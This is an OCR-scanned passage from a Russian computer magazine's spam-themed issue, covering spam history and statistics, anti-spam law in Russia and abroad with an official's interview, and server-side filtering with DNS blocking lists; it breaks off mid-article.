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sode 1 - Culture Shock, «Warhammer: Печать 
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KAKZIOM НОМЕРЕ: 
* ДВА 
двухслойных DVD (общий объем 17 Gb); 
* ДВА 
постера; 
* ДВЕ 
наклейки!!! 


tro 


Приветствую, тебе когда-нибудь хотелось убить 
спамера? Вонзить ему в живот ржавый кинжал, 
намотать его кишки себе на руку, вскрыть грудь, 
вырвать сердце и тут же сожрать его? Так BOT, 

в этом номере на данную тему ты не найдешь ни- 
чего. Мы — журналисты, а не какие-то маньяки 
(кстати, хоть мы и не маньяки, но сексуальные. 
Правда, это к делу не относится), и подобные мыс- 
ли нас не посещают, даже когда мы выкачиваем 
письма из наших публичных ящиков типа 

spec @real.xakep.ru ;). И все-таки, почти каждому 
из нас хоть немного интересно, как и чем живут 
эти представители темной стороны компьютерной 
Силы, как они собирают свои спам-листы, как об- 
ходят фильтры, с помощью чего рассылают пись- 
ма и сколько денег за это получают. Как и чем 

с этим бороться, какие технологии антиспама су- 
ществуют и какие появятся? Ну что же, вы хотите 
песен — их есть у меня! Весь этот номер посвящен 
исключительно спаму! Хотя стоп. Кажется, я при- 
вираю. На самом-то деле мы подумали и решили 
удвоить удовольствие, получаемое читателями 

OT нашего журнала. Теперь в каждом номере не 
одна, а ДВЕ темы! В этом — читай про не-РС архи- 
тектуры. Кстати, нам и самим интересно было 

про них почитать :). 


Добрый Dr.Klouniz 
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систем, из которых реально использует W2K, а любит FreeBSD 4.5. 
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{первый спам} В отделе маркетинга 
американской компании Defense 
Communications Agency (DCA) нашел- 
ся человек, назвавшийся Gary Thuerk, 
которому показалась чрезвычайно 
удачной идея разослать по существо- 
вавшей тогда сети Arpanet приглаше- 
ние на презентацию ОСА. 


Пол Грэм первым 
предложил использовать 
статистический подход 
для борьбы со спамом 


Какой в твоей почте процент спама? 


1994 


{день рождения спама} Дата, которую 
часто принято считать днем рожде- 
ния спама. В штате Аризона супруги 
Лоренс Кантер и Марта Сигел, дер- 
жавшие юридическую фирму, с по- 
мощью реп-скрипта наводнили ин- 
тернет рекламой своих услуг. Это 
вызвало бурю негодования, супруги 


По результатам опроса на www.securitylab.ru 


количество ответивших {2003} 


менее 20% 


37% 


{2006} 


41% 


20-40% 


18% 


11% 


40-60% 1 4% 1 2% 
60-80% 1 4% 1 3% 


более 80% 


16% 


23% 


стали антигероями, подверглись не- 
шуточному давлению как со стороны 
провайдеров, так и со стороны еще 
немногочисленной сетевой общест- 
венности. Причем смаперская атака 
была нацелена на интернет-форумы 
и конференции, а не на личные е-тай 
адреса. 


2002 


{борьба с рекламными письмами} 
Американский программист и пред- 
приниматель Пол Грэм опубликовал 
в Сети статью (www.paulgraham.com/- 
spam.html), весьма подробно описыва- 
ющую эффективный метод борьбы 
с рекламными письмами. Этот метод 
основывается на теории вероятности 
и использует для фильтрации спама 
алгоритм Бейеса. Созданный Грэмом 
простой фильтр смог обнаружить 
79,7% спама, и лишь в 1,2% случаев 
к спаму были отнесены обычные 
письма. Однако усовершенствова- 


2003 


{антиспаммерская коалиция} «Лабо- 
ратория Касперского» предложила 
создать национальную коалицию про- 
тив спама. Учредителями стали веду- 
щие компании российской компью- 
терной индустрии: «Лаборатория Ка- 
сперского», «Ашманов и Партнеры», 
Голден Телеком, Mail.Ru, Rambler, 
Subscribe.Ru и московское представи- 
тельство Microsoft. Основные напра- 
вления деятельности: законодатель- 
ные инициативы (проект закона о спа- 
ме, проекты поправок к законодатель- 
ству, внесение законопроектов в госу- 
дарственную думу), правоприменение 
(идентификация спамеров, судебные 
иски кним), технологические инициати- 
вы (выработка общих принципов филь- 
трации спама, создание общенацио- 
нальной системы борьбы со спамом). 


ние этой системы оказалось более 
сложной задачей. Грэм посвятил ее 
решению более полугода, пока ему 
не пришло в голову использовать для 
фильтрации спама статистические 
алгоритмы. В разработанном Грэмом 
прототипе фильтра каждому встре- 
чающемуся в электронной переписке 
слову или тэгу присваивается значе- 
ние вероятности его наличия в спаме. 
На основе этих вероятностей с по- 
мощью алгоритма Бейеса вычисля- 
ется вероятность того, что данное 
письмо является спамом. 


эта 


чего в спаме много, 
так это виагры и обещаний поднять 
потенцию до невиданных высот 


2005-2006 


Болезнь под названием «спам» дей- 
ствительно существует. И этот факт 
наглядно подтверждает статистика. 
По данным Лаборатории Касперско- 
го, доля спама в общем потоке почто- 
вого трафика рунета уже не опускает- 
ся ниже 70% (единственное исключе- 
ние — новогодние праздники, когда 
доля спама падает до 50-60%). Конеч- 
но, все это усредненные данные. 
К примеру, на серверах бесплатной 
почтовой службы Май.ги или Уапаех 


2006 


доля спама будет еще выше и может 
превышать 90%. А на небольших кор- 
поративных серверах, наоброт, мо- 
жет быть и ниже 70%. К счастью, та 
же статистика показывает, что эффек- 
тивное лекарство есть — современ- 
ные антиспам-программы способны 
обеспечить высокий уровень фильтра- 
ции спама, отсекая более 90 «мусор- 
ных» сообщений из каждых 100, ата- 
ковавших электронную почту поль- 
зователей. 


2006 


спам живет 
до тех пор, пока есть те, 
кто соблазняется 
на рекламу 


ORTHOP 2005. Cont NODS 2006 


fone спама 


BRREREEREE 


Эксперты Spamhaus (www.spamhaus.org) 
утверждают, что 80 процентов спама 
рассылают одни и те же спамеры. 
А тройка самых активных спамеров, 
по их мнению, выглядит так: Алексей 
Поляков (Украина), Леонид Куваев 
(Россия) и Майкл Линдсей (США). Все 
они подозреваются в организации се- 
тей зомбированных компьютеров и 
рассылке спама, в том числе порног- 
рафического содержания. 


2006 


Согласно результатам исследования 
компании IronPort, только с апреля по 
июнь объемы спама в мире выросли 
на 40%, а за год прирост составил все 
83%. При этом спамеры совершен- 
ствуют методы и технологии рассыл- 
ки. Из этих же исследований следует, 
что спамеры в течение нескольких ча- 
сов меняют IP-anpeca источника спа- 
ма (продолжительность «жизни» спа- 
мового URL сократилась до 4 часов), 
рассылаемого из зомби-сетей. При 
этом ссылки, которые обычно содер- 
жат спам-сообщения, меняются с той 
же частотой. Это означает, что к тому 


В Москве был убит один из, наверное, 
самых известных российских спаме- 
ров. Смерть руководителя «Центра 
английского разговорного языка» 35- 
летнего Вардана Кушнира наступила 
от закрытой черепно-мозговой трав- 
мы и множественных ушибленных 
ран головы. Рунету это организация 
более известна как «Центр американ- 
ского английского». Расходы Центра 
на спамерские рассылки аналитики 
оценивали как «не менее $10000» 
в месяц. Фигурируют две версии убий- 
ства: напали грабители или же он по- 
платился за свои методы работы. 


времени, когда URL будет внесен 
в традиционные блэк-листы, спам 
с этой ссылкой уже попадет в почто- 
вые ящики пользователей, а спамеры 
изменят ссылку в рассылаемых сооб- 
щениях. 


устройства гопРой предназначены 


для защиты систем электронного обмена 
сообщениями от угроз извне 


Доля спама в общем 
потоке почтового 
трафика рунета 


Доля спама, 

которую практически 
все производители 
антиспама 
клятвенно обещают 
отсечь 


95% 


45% 


По данным опроса в рамках проекта 
www.securitylab.ru с большим отрывом 
у пользователей по распространен- 
ности лидирует почтовый клиент 
TheBat! — 45,17%. В порядке убыва- 
ния перечислим другие распростран- 
неные почтовые клиенты: Mozilla 
Thubderbird (14,19%), Microsoft Outlook 
2003 (9,02%), web-nouta (7,42%), 
Microsoft Outlook express (6,77%), Kmail 
(3,06%), Opera's built-in e-mail client 
(3,02%), Microsoft Outlook XP (1,51%), 

Microsoft Outlook 6.0/97/2000 (1,42%). 


95% 


Доля спама, которую практически 
все производители антиспама обе- 
щают отсечь. И хотя эта планка дос- 
таточно высока, оставшиеся 5% мо- 
гут стать ощутимым количеством му- 
сора, если общий поток писем значи- 
тельный. 
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Закон против спама 


для руководителя 


ВСЕ ПРИВЫКЛИ, ЧТО ОТ СПАМА МОЖНО ЗАЩИТИТЬСЯ ТОЛЬКО С ПОМОЩЬЮ 
СПЕЦИАЛЬНЫХ ПРОГРАММ, НО ЭТО НЕ ТАК. В ЛЮБОМ ГОСУДАРСТВЕ ПРАВА ЧЕЛОВЕКА 
ОХРАНЯЮТСЯ ЗАКОНОМ, БОЛЕЕ ТОГО, ОНИ НАМ ГАРАНТИРОВАНЫ. ТАК ПОЧЕМУ БЫ 
НЕ НАЧАТЬ ОТСТАИВАТЬ СВОИ ПРАВА В КИБЕРПРОСТРАНСТВЕ С ПОМОЩЬЮ ЗАКОНА? 


Для простого человека это труднореализуемо и за- 
частую не выгодно. К тому же, так повелось, что 
в нашей стране половина населения вообще не 
знает о существовании жизненно необходимых за- 
конов. Этим и пользуются все, начиная от мелких 
продавцов и заканчивая самими чиновниками. Мы 
расскажем про законы, с помощью которых можно 
пригвоздить спамера к стенке (при условии, что он 
будет обнаружен нашими доблестными органами), 
и про законы, которые принимаются в других стра- 
нах для борьбы с рекламным мусором. 

Наша страна всегда отличалась своей тор- 
мознутостью: это касается почти всех сфер дея- 
тельности, в том числе и принятия нужных зако- 
нов. У нас обычно первым делом принимают те 
законы, которые выгодны государству, а не его 
гражданам. Закона, который должен защищать 


нас от нежелательных рекламных рассылок (речь 
идет непосредственно об электронных рассылках) 
не было очень долгое время. И вот настал день, 
когда в России внесли кардинальные поправки 
в закон «О рекламе». В нем есть статья (номер 
18), нормы которой призваны защищать нас от 
действий спамеров. 

Согласно этой статье, никто не имеет право 
заниматься рассылкой рекламы без согласия на 
это ее получателя. То есть пока ты не разрешишь 
спамеру слать тебе рекламу, он не имеет право 
этого делать. Если же он все-таки отправил тебе 
письма без разрешения, то при первом твоем же- 
лании он должен прекратить рассылку. В против- 
ном случае происходит нарушение конституцион- 
ных прав гражданина, что считается очень серьез- 
ным преступлением. Это касается не только интер- 
нета, но и сотовой связи. До внесения этой поправ- 
ки (года полтора назад) у операторов было в моде 
рассылать смс с рекламой различного мультиме- 
дийного контента. > 
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законопроекты 
будущего 


В 2004 ГОДУ У КАКОГО-ТО УМНОГО 
ЧЕЛОВЕКА ПОЯВИЛАСЬ МЫСЛЬ: 

«А ПОЧЕМУ БЫ НЕ БОРОТЬСЯ СО СПАМОМ 
ВМЕСТЕ?». ПОСИДЕЛ OH , ПОДУМАЛ 

И РЕШИЛ ПРИГЛАСИТЬ РАЗНЫЕ СТРАНЫ 
ДЛЯ ОБДУМЫВАНИЯ ПРОБЛЕМЫ СПАМА. 
ГОСУДАРСТВ, ЖЕЛАЮЩИХ ВСТУПИТЬ 

В ТАКОЙ ПРОЕКТ, ОКАЗАЛОСЬ 
ДОСТАТОЧНО БОЛЬШОЕ КОЛИЧЕСТВО: 
США, ВЕЛИКОБРИТАНИЯ, ГЕРМАНИЯ, 
ЯПОНИЯ. С 2006 ГОДА К ПРОЕКТУ 
ПРИСОЕДИНИЛАСЬ И РОССИЯ. ЦЕЛЬ 
ПРОЕКТА — СОВМЕСТНАЯ РАЗРАБОТКА 
ЗАКОНОВ, НАПРАВЛЕННЫХ НА БОРЬБУ 
СО СПАМОМ. 


ИДЕЯ ПОДОБНОГО ПРОЕКТА 
ДОСТАТОЧНО ПЕРСПЕКТИВНА, 

ТАК КАК ЕСЛИ В КАЖДОЙ СТРАНЕ БУДУТ 
ПРИБЛИЗИТЕЛЬНО ОДНИ И ТЕ ЖЕ 
НОРМЫ, ОБЕСПЕЧИВАЮЩИЕ ЗАЩИТУ 
ОТ СПАМА (В ИДЕАЛЕ ПРОБЛЕМА БУДЕТ 
РЕГУЛИРОВАТЬСЯ НОРМАМИ 
МЕЖДУНАРОДНОГО ПРАВА), 

ТО СПАМЕРАМ БУДЕТ ТРУДНЕЙ УЙТИ 

ОТ ЗАКОНА. ИНАЧЕ ВЕСЕЛО ПОЛУЧАЕТСЯ: 
В ОДНОЙ СТРАНЕ ЗА СПАМ В КАЧЕСТВЕ 
НАКАЗАНИЯ ПРЕДУСМОТРЕНО 10 ЛЕТ 
ТЮРЬМЫ, А В ДРУГОЙ — ВСЕГО ЛИШЬ 
ШТРАФ В 10 МРОТОВ. 


За нарушение данной статьи не установлена санкция. 
Но не стоит думать, что если в законе не указана ме- 
ра ответственности за преступление, то его можно не 
соблюдать. Данная статья является бланкетной, то 
есть отсылает нас к другим источникам — в частнос- 
Tu, к Кодексу об административных правоотношени- 
ях и Гражданскому кодексу. А вот благодаря этим 
сборникам норм можно по-разному повернуть ситуа- 
цию. То есть если ты хочешь проучить пойманного 
спамера, то можешь в своем иске описать все нару- 
шенные им права. Если внимательно подойти к это- 
му вопросу (проштудировав перечисленные кодек- 
сы), то в суде можно изрядно потрепать преступника. 

Вроде все хорошо, но как обстоят дела на 
практике? В обычной жизни все не так радужно. Ко- 
нечно, все уважающие себя крупные компании изу- 
чили закон и придерживаются его рамок. Хуже де- 
ла обстоят с интернетом. Спамеры никак не отреа- 
гировали на этот закон, и рассылок меньше не ста- 
ло. Наоборот, спамеры стали даже писать в конце 
писем извинения и инструкцию, как исключить свой 
адрес из их базы. Как правило, после проделанных 
действий спама в ящике не становится меньше — 
его количество только начинает увеличиваться, по- 
тому что, написав письмо спамеру, ты автоматичес- 
ки подтверждаешь свою активность. Спамер узна- 
ет, что ты проверяешь свой ящик и читаешь письма 
рекламного характера, а значит, тебе можно высы- 
лать чуточку больше рекламы. 

Почему же нормы закона не действуют в пол- 
ную силу? Порой кажется, что проблема заключа- 
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|| КАК ВЫ ОТНОСИТЕСЬ К СПАМУ 
И СПАМЕРАМ В ЧАСТНОСТИ? 


Я больше привык использовать термин реклама. 
Отношусь отрицательно. Электронной почтой я 
пользуюсь не очень часто, так как приходится рабо- 
тать непосредственно с населением, но когда про- 
веряю ее, то примерно 1/3 писем в ящике — рек- 
ламного характера. К спамерам отношусь как к пра- 
вонарушителям. Реклама в наши дни везде: на вы- 
весках, всевозможных стендах, в подъездах. OT Hee 
и так тошнит. Поэтому вдвойне неприятно, когда 
она еще и в твою почту просачивается. 


НОВАЯ ПОПРАВКА К ЗАКОНУ 

«О РЕКЛАМЕ» ДАСТ КАКИЕ-НИБУДЬ 
ИЗМЕНЕНИЯ, СТАНЕТ ЛИ СПАМЕРОВ 
МЕНЬШЕ? 


Коренных изменений не произойдет. Рассылка рек- 
ламы без согласия получателя — это правонаруше- 
ние. У граждан нашей страны еще не развилось 
чувство патриотизма, и правонарушения происходят 


ется в нашем менталитете. В большинстве случа- 
ев мы привыкли на все закрывать глаза и мирить- 
ся с происходящим. Мы не хотим отстаивать свои 
права в суде, мы не хотим шевелиться. Конечно, 
речь идет не об обычных пользователях, которые 
замучились вычищать свои ящики от спама, 
аокрупных компаниях, у которых есть профессио- 
нальные юристы, наученные борьбе с нарушителя- 
ми гражданских прав. Не факт, что это сразу помо- 
жет, но это как минимум станет катализатором для 
всех государственных органов, которые занимают- 
ся защитой наших прав. 

Чем больше мы будем обращаться в суд для 
защиты своих прав, тем быстрее будут совершен- 
ствоваться нормы, которые направлены их защиту. 
Если посмотреть на опыт западных стран, то станет 
ясно, как они борются с проблемой спама. Делает- 
ся это просто — при помощи граждан. Западные 
государства гораздо серьезнее относятся к защи- 
те интересов своих людей. Посмотри ленты новос- 
тей, где чуть ли не каждую неделю появляется нес- 
колько новостей типа: «Такой-то спамер был при- 
говорен к тюремному заключению». В отличие от 
России, где за распространение спама предусмот- 
рена только гражданская и административная от- 
ветственность, в других странах спамеров могут 
упрятать за решетку. А это лишний повод для на- 
шего спамера начихать на закон. 
>  P.S. Простой пользователь, поставь какой- 
нибудь спам-фильтр и не забивай себе голову. 
Так ты сэкономишь свое время и нервы © 


чуть ли не каждый день. Мелкие, но совершаются. 
Поэтому поправка к закону вряд ли даст какие-либо 
серьезные результаты. В нашей стране нарушаются 
тысячи законов, так почему этот должен соблюдать- 
ся? Это невозможно. 


СЕЙЧАС МНОГИЕ ЕВРОПЕЙСКИЕ 
СТРАНЫ (В ТОМ ЧИСЛЕ И РФ) 
ОБЪЕДИНЯЮТСЯ В КОАЛИЦИЮ 
ДЛЯ СОВМЕСТНОЙ РАЗРАБОТКИ 
ЗАКОНОПРОЕКТОВ, 
НАПРАВЛЕННЫХ НА ПРЕСЕЧЕНИЕ 
РАСПРОСТРАНЕНИЯ СПАМА. 
МОЖЕТ ЛИ ЭТО ПРИНЕСТИ 
КАКОЙ-НИБУДЬ ОЩУТИМЫЙ 
ЭФФЕКТ? 


Вряд ли. Это не единственный случай, когда страны 
пытаются создать какие-нибудь общие законопро- 
екты. Международно-правовых норм принято ог- 
ромное количество, вот только соблюдаются ли они 
должным образом? Скорее всего, так будет и 
в этом случае. Возможно, в других странах эти за- 


{Китай} В этой стране проблеме спама уделяется 
далеко не самое последнее место, да и вообще 
китайцы всегда основательно подходят к различ- 
ным проблемам. Если ты регулярно читаешь но- 
вости в интернете, то должен был слышать о вся- 
ких громких событиях в информационном мире, 


где главным героем был Китай: ограничение 
доступа к Google, ограничение доступа к 
Wikipedia и так далее. Со спамом та же ситуация. 
В начале 2006 года китайское правительство 
приняло закон о запрете спама. В отличие 

от российского закона «О рекламе», в китайской 


его версии все нормы закона относятся к расп- 
ространению рекламы непосредственно через 
информационные технологии. Исполнение 
законов во многом зависит от меры наказания 
за их несоблюдение, а в Китае это особенно ак- 
туально, так как там до сих пор не отменена 


смертная казнь. 


{Германия} В Германии ситуация со спамом 
обстоит не очень хорошо, точнее ужасно. Причи- 
на всему — отсутствие законопроекта о спаме, 

и из-за этого немецкие спамеры — одни из самых 
активных в мире. В ноябре 2006 компания 
Microsoft подала несколько исков на немецких 


спамеров, и по одному из них суд вынес решение, 
в котором спамера обязали выплатить штраф. 
Размер штрафа неизвестен, но я подозреваю, 
что его сумма немаленькая. 


конопроекты будут работать, но у нас... Принять 
можно любой закон, это не проблема, гораздо тяже- 
лее добиться его соблюдения. У нас достаточно су- 
ровые санкции за убийства, но становится ли их 
меньше? Нет, а это одно из самых серьезных прес- 
туплений. Что тогда можно говорить о рекламе. 


В НЕКОТОРЫХ СТРАНАХ 

ЗА РАСПРОСТРАНЕНИЕ СПАМА 
ПРЕДУСМОТРЕНО НАКАЗАНИЕ 

В ВИДЕ ЛИШЕНИЯ СВОБОДЫ. 

НЕ СЛИШКОМ ЛИ СУРОВО ЗА ТАКОЕ 
ПРЕСТУПЛЕНИЕ? 


Никто не заставляет нарушать закон. Если его 
соблюдать, то бояться нечего. Санкция вполне 
справедливая, человек должен подумать перед 
тем, как что-то совершить. Если установить не- 
большие денежные штрафы, то нарушителям бу- 
дет выгодно их платить, так как на распростране- 
нии рекламы они неплохо зарабатывают. Я не 
знаю точных цен, но если бы мало получали, 
то никто бы этим не занимался. 


ПРОБОВАЛИ ПОДАТЬ НА СПАМЕРОВ 
ИСК? ВООБЩЕ, ЧЕГО РЕАЛЬНО 
МОЖНО ДОБИТЬСЯ, ЕСЛИ 
РАЗБИРАТЬСЯ ПО ЗАКОНУ? 


Смеешься? Я пользуюсь почтой эпизодически, мне 
проще удалить то, что мне не нужно, не заостряя на 
этом внимания. Что касается второй части, то это 
спорный вопрос. Если смотреть с точки зрения за- 
конодательства, то можно надеяться на справедли- 
вость и возмещение причиненного вреда. Но в ре- 
альной ситуации все не так просто. Ты можешь по- 
дать иск в суд на рекламодателя: как правило, 
в рекламных письмах есть все необходимые теле- 
фоны, а иногда и юридические адреса фирм, рек- 
ламирующих свои товары. Здесь тебе, возможно, 
повезет, так как проблем с поиском рекламодате- 
ля быть не должно. Но если ты хочешь наказать 
рекламораспространителя, то тут будет сложней. 
Для начала нужно выяснить его местонахождение. 
Вот только как это сделать? Могут потребоваться 
серьезные затраты. А значит, игра не стоит свеч. 
Даже если тебе удастся найти обидчика, то быть 


{Австралия} За распространение спама в Австра- 
лии в качестве наказания предусмотрен штраф. 
Причем сумма штрафа довольно велика. 
Например, в первых днях ноября в Австралии был 
пойман спамер. Его вина была полностью доказа- 
на, в качестве меры наказания был применен 
штраф в размере 4,5 миллионов долларов. Неп- 
лохо, да? Если бы в нашей стране были такие же 
суровые санкции, то, скорее всего, спамеров ста- 
ло бы меньше. 


{США} США — родители интернета, а, следова- 
тельно, все последствия неправильного воспита- 
ния чада в первую очередь проявляются именно 
в этой стране. Вирусные эпидемии, самый боль- 
шой поток спама и другие гадости зарождаются 
в Америке. Это первая по объему рассылаемого 
спама страна. 

Как известно, американское правительство 
с паранойей относится ко всякого рода угрозам 
правам своих граждан и сразу старается закрепить 
все законодательно. Проблема спама — не исклю- 
чение. В США принят ряд законопроектов, в кото- 
рых указана ответственность за рассылку спама. 
Система наказаний очень гибка: можно отделаться 
простым предупреждением, а можно заработать 
срок с огромным штрафом. И в последнее время 
самое распространенное решение судей в отноше- 
нии спамера это штраф + тюремное заключение. 
Причем штрафы бывают огромными. 


уверенным в каком-то определенном решении су- 
да нельзя. Может случиться так, что затраты ока- 
жутся больше, чем сумма возмещения вреда. Кто- 
му же, все это займет слишком много времени. 


Скорее всего да. Каждый день появляются новые 
фирмы/компании, все хотят заработать, а для ус- 
пешного ведения бизнеса нужна реклама. Следо- 
вательно, объемы рекламы, распространяемой 
посредством электронной почты, будут увеличи- 
ваться. Это банальная конкуренция, только 
не этичная по отношению к потребителям. 


Да. По электронной почте greed @mail.sovgav.ru 
или через наш официальный сайт — www.admsov- 
gav.ru. Если будут интересные вопросы, то я непре- 
менно на них отвечу. 


КАКОВ ПРОГНОЗ, БУДУТ ЛИ РАСТИ 
ОБЪЕМЫ СПАМА? 


МОГУТ ЛИ ЧИТАТЕЛИ ЗАДАТЬ 
ВАМ ВОЗНИКШИЕ У НИХ ВОПРОСЫ? 
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все ПОЧИНИМ 


Давим спам прямо на сервере 


МЕТОДИКИ БОРЬБЫ СО СПАМОМ НЕПРЕРЫВНО СОВЕРШЕНСТВУЮТСЯ: ОБРАЗУЮТСЯ 
РАСПРЕДЕЛЕННЫЕ ЦЕНТРЫ, ВЕДУЩИЕ «ЧЕРНЫЕ СПИСКИ», СОЗДАЮТСЯ ИЗОЩРЕННЫЕ 
ПРОГРАММНЫЕ ФИЛЬТРЫ, ПРЕДНАЗНАЧЕННЫЕ КАК ДЛЯ ПРОВАЙДЕРОВ, ТАК И ДЛЯ 
ПРОСТЫХ ЛЮДЕЙ. КАКИЕ ТЕХНИЧЕСКИЕ СРЕДСТВА СОПРОТИВЛЕНИЯ СУЩЕСТВУЮТ 
НА ДАННЫЙ МОМЕНТ, ЧЕМ ОНИ ОТЛИЧАЮТСЯ ОТ ДРУГ ДРУГА, ГДЕ ИХ ДОСТАТЬ И КАК 


ПРАВИЛЬНО НАСТРОИТЬ И УСТАНОВИТЬ? 


Поразительно, но даже крупные провайдеры зачас- 
тую совершенно не осведомлены в этих вопросах. 
Бедные их клиенты... Массовая почтовая рассылка 
по-прежнему остается самым дешевым и эффек- 
тивным видом рекламы, а это значит, что ее будут 
производить до тех пор, пока не появятся соответ- 
ствующие законодательные ограничения, регули- 
рующие этот вопрос. Но юридические колеса вра- 
щаются крайне медленно (особенно если это не ка- 
сается вопросов, волнующих самих законодате- 
лей), и со спамом приходится бороться методом 
партизанского ополчения. 

Владельцы бесплатных почтовых ящиков боль- 
ше всех озабочены проблемой и прилагают значи- 
тельные усилия для подавления спама, ведь вводить 
в строй дополнительные аппаратные мощности и 
прокладывать новые каналы им приходится на свои 
средства. От спама страдают и корпоративные сети, 
поскольку огромное количество писем не только па- 
рализует нормальную работу сотрудников, но и сос- 
тавляет существенную статью расхода от общего 
процента полезного трафика. Коммерческие провай- 
деры, предоставляющие почтовые ящики в комплек- 
се с остальными услугами по выходу в интернет, 


самые лучшие 
и могучие 


СЛЕДУЮЩИЙ НАБОР DRBL-BAS 
ПОЗВОЛЯЕТ ОБНАРУЖИВАТЬ ДО 30% 
СПАМЕРСКИХ ПИСЕМ: 


— LIST.DSBL.ORG 

— DNSBL.NJABL.ORG 

— SBL.SPAMHAUS.ORG 

— PROXIES.BLACKHOLES.EASYNET.NL 


к спаму относятся нейтрально (а часто и сами явля- 
ются спамерами). Ведь трафик оплачивает клиент, 
так что чем больше корреспонденции он получит — 
тем лучше! Ну, а бороться за «качество сервиса» — 
просто смешно. Доход от «продажи» почтовых ящи- 
ков слишком мал, да и большинство пользователей 
отдают предпочтение бесплатным службам, не свя- 
занным с конкретными провайдерами. 

Отношение самих пользователей к спаму 
разное, но чем медленнее (и дороже!) канал, сое- 
диняющий человека с «внешним миром», тем ост- 
рее он реагирует на каждое нежелательное пись- 
мо, упавшее в его ящик. Увы, с клиентской сторо- 
ны очень сложно что-либо предпринять. Ведь что- 
бы определить, спам это или не спам, фильтр дол- 
жен скачать письмо с сервера. И какая радость от 
того, что «левая» корреспонденция будет автома- 
тически перемещена в «корзину» или в junk-folder? 
Тратить время на перекачку и оплачивать трафик 
все равно придется. Владельцам скорострельных 
ОЗЁ-модемов это, может быть, и ничего, а вот тех, 
кто выходит в Сеть через GPRS, это сильно напря- 
гает. Поэтому имеет смысл говорить о серверной 
стороне проблемы. 
> — арсенал средств борьбы. Методы противо- 
действия спаму во всем своем многообразии де- 
лятся на две основные категории: технические и 
нетехнические. К нетехническим в первую оче- 
редь относится физическое отключение клиен- 
тов, занимающихся массовой рассылкой (что 
обычно предусмотрено договором с провайде- 
ром). Поэтому спамерам приходится либо самим 
владеть магистральными интернет-каналами, ли- 
бо использовать ргоху-серверы, бесплатные поч- 


товые службы, допускающие отправку большого 
количества писем за короткое время, а так же 
червей, проникающих на чужие компьютеры и ве- 
дущих рассылку от их лица. 

Изобилие интернет-провайдеров, а также 
большое количество «демократически» настроен- 
ных ргоху и тай-серверов (не говоря уже о дронах) 
создают крайне благоприятные условия для проц- 
ветания спамеров. Как их ни отключай, они упорно 
продолжают расти, вынуждая прибегать к фильт- 
рации корреспонденции. 

На почтовый сервер устанавливается антис- 
памерский фильтр, пропускающий «правильные» 
письма и палящий всю непрошеную корреспонден- 
цию. Различные классификаторы выделяют от двух 
до четырех методов фильтрации. Два основных — 
это ведение «черных» и «белых» списков адресов 
и анализ содержимого письма (сигнатурный, фор- 
мальный и лингвистический). Остальные — их под- 
типы. 
> — иньиян — черные и белые списки. Практи- 
чески все крупные «почтовики» подключены 
к распределенным базам данных DRBL 
(Distributed Real-time Blocking List), содержащим 
IP-anpeca серверов (и даже целые подсети), заме- 
ченных или заподозренных в спамерской актив- 
ности. Они обновляются в реальном времени каж- 
дые несколько минут. Стоит клиентам одного про- 
вайдера пожаловаться на спам, как база пополня- 
ется новой записью: IP-agpecy (адресам), с кото- 
рого производилась рассылка, выставляется бан, 
перекрывающий спамеру кислород. В среднем на 
подавление рассылки уходит до 15 минут, но, учи- 
тывая пропускную способность современных ка- 


налов связи, за это время спамеру удается разос- 
лать миллионы писем! 

Несмотря на все усилия по консолидации, 
эффективность DRBL-6a3 крайне низка и они отсе- 
ивают порядка 20%-30% рекламных писем. Оцен- 
ки в 80%, приводимые некоторыми аналитиками, 
явно завышены. Тем не менее, основная ценность 
DRBL-6a3 в том, что они блокируют поступление 
нежелательной корреспонденции еще на «излете», 
позволяя сэкономить на трафике, и это, пожалуй, 
их единственное достоинство. 

О том, какие они создают проблемы, можно 
написать целый талмуд. Вот самый простой при- 
мер. Клиент провайдера устроил массовую рас- 
сылку, желая подзаработать на рекламе. Провай- 
деру выставили бан, лишив всех остальных поль- 
зователей возможности переписки с «внешним» 
миром. А снятие бана требует значительных те- 
лодвижений и к тому же обходится иногда не 
бесплатно. Многие серверы (особенно корпора- 
тивные) отказываются иметь дело с бесплатными 
почтовыми службами, зарезая всю поступающую 
от них корреспонденцию на корню. То же самое 
относится к почтовым ящикам провайдеров, по- 
павших в «черный список» и оставшихся там. Ху- 
же всего, что ситуация с DRBL-6a3amu переменчи- 
ва как погода в осенний день. Еще вчера «все ра- 
ботало» и вдруг сегодня письма внезапно перес- 
тали отправляться и приходить. Пользователи 
психуют и нервничают, а провайдеры пытаются 
разобраться, кто и на кого выставил бан и как этот 
бан можно снять. 

Некоторые администраторы почтовых серве- 
ров заносят в черный список всех, кроме себя, 


и, чтобы отправить им письмо, приходится драть 
задницу на мелкие куски. Прошли те времена, ког- 
да проблема решалась прямым соединением 
с почтовым сервером получателя. Технически по- 
ложить письмо в его ящик, минуя промежуточные 
серверы, вполне возможно — достаточно указать 
его МХ-адрес в качестве ЗМТР-сервера своего лю- 
бимого почтового клиента. Единственный минус 
этого решения был (и есть) в том, что такой SMTP- 
сервер, не являясь «релеем», может рассылать 
письма только по своим локальным адресам (то 
есть на роль транзитного сервера не тянет). При- 
чем если SMTP-cepBep получателя перегружен, 
отключен от Сети или вдруг завис, то релей (в ли- 
це почтовой службы типа тай.ги) будет автомати- 
чески пытаться доставить письмо вновь и вновь, 
а при «прямой» пересылке это приходится делать 
вручную. Это, конечно, минус. Зато можно рассы- 
лать письма, минуя фильтры, установленные на 
крупных почтовых службах, чем с успехом и поль- 
зуются спамеры. Как следствие, администраторы 
настраивают свои $МТР-серверы так, чтобы они 
получали почту только от доверенных «релеев» и 
блокировали всех остальных. Мера не столько су- 
ровая, сколько вынужденная. Если на заре разви- 
тия интернета двухмегабитный канал был преде- 
лом мечтаний крупных провайдеров, то сейчас ку- 
ча компаний предлагает стомегабитные каналы по 
смешной цене, и «прямую» рассылку может осу- 
ществить любой желающий. А желающих столько, 
что каждого не забанишь. 

Из всех DRBL-6a3 стоит отметить Www.Spam- 
Cop.net (коммерческая, с ценой членства в 30 уби- 
тых енотов в год) и www.SORBS.net (спонсируемая та- 
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кими компаниями Kak Sun Microsystems, Source- 
forge и потому предлагающая бесплатное членство 
всем желающим). 

Очень удобна система автоматизированного 
поиска по большому количеству баз на предмет 
«репутации» какого-либо IP-agpeca www.openrbl.org, 
выполняющая reverse-DNS query (определение до- 
менного имени по IP), complete-whois (детальная 
информация по узлу), поиск данного IP в телекон- 
ференциях и, собственно, сам статус адреса по 
каждой из баз, коих там десятки. 

Большой перечень всевозможных DRBL-6a3 
собран на сервере www.moensted.dk/spam, где счет 
идет уже не на десятки, а на сотни. 

Естественно, встает вопрос, как разобрать- 
ся со всем этим хозяйством, кого использовать, 
